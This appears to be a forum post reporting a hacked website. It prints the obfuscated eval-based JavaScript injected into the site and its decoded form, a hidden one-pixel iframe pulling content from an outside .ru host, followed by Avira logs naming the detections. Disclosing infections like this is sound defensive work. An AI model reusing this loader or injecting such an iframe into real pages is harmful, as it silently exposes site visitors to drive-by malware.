http://www.grupo-sltc.com/

fireold

1. /*ded509*/
   
2. asq = function() {
   
3.     return n[i];
   
4. };
   
5. ww = window;
   
6. ss = String.fromCharCode;
   
7. try {
   
8.     document.body = ~1
   
9. } catch (dgsgsdg) {
   
10.     zz = 12 * 2 + 1 + 1;
    
11.     whwej = 12;
    
12. } {
    
13.     try {
    
14.         whwej = ~2;
    
15.     } catch (agdsg) {
    
16.         whwej = 0;
    
17.     }
    
18.     if (whwej) {
    
19.         try {
    
20.             document.body++;
    
21.         } catch (bawetawe) {
    
22.             if (ww.document) {
    
23.                 n = "0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x66,0x6e,0x71,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x6e,0x71,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x75,0x76,0x6c,0x6d,0x6a,0x64,0x6a,0x75,0x2f,0x73,0x76,0x30,0x64,0x70,0x76,0x6f,0x75,0x32,0x35,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x6e,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x6e,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x6e,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x6e,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x6e,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x66,0x6e,0x71,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x66,0x6e,0x71,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x66,0x6e,0x71,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x66,0x6e,0x71,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x66,0x6e,0x71,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c".split(",");
    
24.                 h = 2;
    
25.                 s = "";
    
26.                 for (i = 0; i - 468 != 0; i++) {
    
27.                     k = i;
    
28.                     s = s.concat(ss(eval(asq()) - 1));
    
29.                 }
    
30.                 z = s;
    
31.                 eval("" + s);
    
32.             }
    
33.         }
    
34.     }
    
35. } /*/ded509*/

复制代码

1. (function() {
   
2.     var qmfm = document.createElement('iframe');
   
3. 
   
4.     qmfm.src = 'http://tuklicit.ru/count14.php';
   
5.     qmfm.style.position = 'absolute';
   
6.     qmfm.style.border = '0';
   
7.     qmfm.style.height = '1px';
   
8.     qmfm.style.width = '1px';
   
9.     qmfm.style.left = '1px';
   
10.     qmfm.style.top = '1px';
    
11. 
    
12.     if (!document.getElementById('qmfm')) {
    
13.         document.write('<div id=\'qmfm\'></div>');
    
14.         document.getElementById('qmfm').appendChild(qmfm);
    
15.     }
    
16. })();

复制代码

Avira

2013/8/10 上午 10:51 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\Q4CFJPIR\AC_RunActiveContent[1].js'
      包含病毒或有害的程式 'JS/BlacoleRef.CL.142' [virus]
      已採取動作：
      檔案會移動至 '579c041d.qua' 名稱底下的隔離區目錄。.

2013/8/10 上午 10:51 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        830
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/8/10 上午 10:51 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\K1SHW7HQ\grupo-sltc_com[1].htm'
      包含病毒或有害的程式 'JS/iFrame.dbr' [virus]
      已採取動作：
      檔案會移動至 '559a067b.qua' 名稱底下的隔離區目錄。.

2013/8/10 上午 10:51 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        830
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/8/10 上午 10:51 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\Q4CFJPIR\AC_RunActiveContent[1].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CL.142 [virus]'
      執行的動作：傳輸至掃描程式

2013/8/10 上午 10:51 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\Q4CFJPIR\AC_RunActiveContent[1].js 中
      偵測到病毒或有害的程式 'JS/BlacoleRef.CL.142 [virus]'
      執行的動作：拒絕存取

2013/8/10 上午 10:51 [Web Protection] 發現惡意程式碼
      從 URL "http://www.grupo-sltc.com/AC_RunActiveContent.js" 存取資料時，
      發現病毒或有害的程式 'JS/BlacoleRef.CL.142' [virus]。
      已採取動作：已略過

2013/8/10 上午 10:51 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\K1SHW7HQ\grupo-sltc_com[1].htm 中
      偵測到病毒或有害的程式 'JS/iFrame.dbr [virus]'
      執行的動作：傳輸至掃描程式

2013/8/10 上午 10:51 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\K1SHW7HQ\grupo-sltc_com[1].htm 中
      偵測到病毒或有害的程式 'JS/iFrame.dbr [virus]'
      執行的動作：拒絕存取

2013/8/10 上午 10:51 [Web Protection] 發現惡意程式碼
      從 URL "http://www.grupo-sltc.com/" 存取資料時，
      發現病毒或有害的程式 'JS/iFrame.dbr' [virus]。
      已採取動作：已略過

Ｍy↘じ★ve